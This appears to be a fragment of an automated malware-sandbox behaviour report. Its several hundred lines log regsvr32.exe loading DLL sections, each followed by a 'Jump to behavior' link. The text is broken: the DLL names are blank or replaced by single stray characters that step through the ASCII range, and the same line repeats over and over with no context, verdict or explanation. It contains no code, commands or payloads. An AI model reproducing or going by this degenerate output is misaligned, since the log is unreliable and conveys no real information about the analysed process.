            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ~ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: } .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: | .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: { .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ` .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: _ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ^ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ] .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: [ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: @ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ? .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: > .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: = .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: < .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ; .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: : .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 9 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 8 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 7 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 6 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 5 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 4 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 3 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 2 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 1 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 0 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: - .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: , .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: + .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: * .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ) .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ( .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: & .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: % .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: $ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: # .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ! .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
